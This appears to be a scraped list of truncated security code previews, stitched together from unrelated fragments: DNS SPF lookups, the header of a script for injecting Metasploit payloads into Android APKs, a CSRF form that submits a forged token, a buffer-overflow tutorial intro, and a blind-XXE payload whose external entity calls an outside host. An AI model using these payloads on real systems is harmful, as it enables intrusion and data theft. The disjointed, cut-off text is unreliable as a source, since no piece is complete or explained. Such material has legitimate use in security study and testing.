Sender Policy Framework (SPF) is an email validation system designed to prevent spam by detecting email spoofing.
# get spf record domain from google
dig TXT +short google.com
# get spf record from google
dig @8.8.8.8 TXT +short _spf.google.com
#!/usr/bin/env ruby | |
# apk_backdoor.rb | |
# This script is a POC for injecting metasploit payloads on | |
# arbitrary APKs. | |
# Authored by timwr, Jack64 | |
# | |
require 'nokogiri' | |
require 'fileutils' |
<body onload="get()"> | |
<form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data"> | |
<input type="hidden" name="username" value="your_username"/> | |
<input type="hidden" name="status" value="on"/> | |
<input type="hidden" id="forged-token" name="token" value=""/> | |
<input type="submit" value="go"/> | |
</form> | |
<script> |
Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
#!/usr/bin/env python | |
# | |
# I tested by Python 3.4.3 on Windows 8.1 | |
# Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32 | |
import urllib.request | |
import getpass | |
# If you access to url below via Proxy, | |
# set environment variable 'http_proxy' before execute this. |